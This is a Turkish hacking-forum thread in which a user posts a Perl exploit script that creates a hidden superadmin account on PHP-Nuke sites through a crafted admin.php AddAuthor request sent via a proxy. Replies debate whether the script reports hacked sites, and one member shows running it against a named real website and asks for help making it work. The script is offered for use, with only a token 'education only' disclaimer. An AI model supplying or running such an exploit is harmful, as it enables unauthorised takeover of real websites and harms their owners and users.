PHP-NUKE all versions add admin exploit

Partizan

Partizan

New member
Katılım
18 Haz 2005
Mesajlar
1,346
Reaction score
0
Puanları
0
Yaş
44
Konum
Cuba
Kod: 
#!/usr/bin/perl
use LWP::UserAgent;

print "========================================\n";
print " PHP-NUKE all versions add admin exploit\n";
print "    Exploit coded by matrix_killer\n";
print "     Greetz to all omega-team members\n";
print "     See the sourece for more information\n";
print "========================================\n";


print "Enter host: "; #example:[url]www.host.org[/url]

my $host=<STDIN>;

chomp ($host);

print "Enter username: "; #example:Lamer

my $user=<STDIN>;

chomp ($user);

print "Enter pass: "; #example:lamer

my $pass=<STDIN>;

chomp ($pass);

print "Enter base64 username and md5 hash: ";

my $base64=<STDIN>;

chomp ($base64);


my $ua = new LWP::UserAgent;
$ua->proxy(['http'] => 'http://192.168.166.167:6588'); #setup here the proxy and the port
#Change the base64 text to the base 64 username and password
my $xpl="http://$host/admin.php?op=AddAuthor&add_aid=$user&add_name=God&add_pwd=$pass&[email protected]&add_radminsuper=1&admin=$base64";

my $res = $ua->request(new HTTP::Request POST => $xpl);
print "DONE !!! Now go to $host/admin.php and login as $user for username and $pass for password\n";

#For questions send me a e-mail to [email][email protected][/email]
#I'm not responsible for the damage that you will make with this exploit.The exploit is wrighten for education purposes only !
 
Partizan bak bu expolitle hackledigin her site rapor olarak gidiyor hemde hepsi :mad:
http://$host/admin.php?op=AddAuthor&add_aid=$user&add_name=God&add_pwd=$pass&add_email=[email protected]&add_radminsuper=1&admin=$base64";
 
Alakası yok, sadece hedef siteyi belirtmiş perl'de derlerken yazdığın şifreleri kendi oraya koyuyor ona göre hareket ediyor. God admin açığı çok eski bir açıktır işe yaramaz, emeğe saygı...
 
zebani_81' Alıntı:
Partizan bak bu expolitle hackledigin her site rapor olarak gidiyor hemde hepsi :mad:
http://$host/admin.php?op=AddAuthor&add_aid=$user&add_name=God&add_pwd=$pass&add_email=[email protected]&add_radminsuper=1&admin=$base64";
Genişletmek için tıkla ...
o mail eklediği adminin maili :D
 
C:\Perl\bin>perl a.pl multisohbet.com /
========================================
PHP-NUKE all versions add admin exploit
Exploit coded by matrix_killer
Greetz to all omega-team members
See the sourece for more information
========================================
Enter host:
Enter username:
Enter pass:
Enter base64 username and md5 hash:
DONE !!! Now go to /admin.php and login as for username and for password
BOYLE BIR MESAJ CIKIYOR BUNU KULLANINCA YANLIZ BIR SORUNVAR USER VE HSOT ISIMLERINI GIRIZORUM AMA SAYFA KABUL ETMIZYOR BILGINIZE ACIL HELPPP
 
Cevap yazmak için giriş yap yada kayıt ol.
Geri
Üst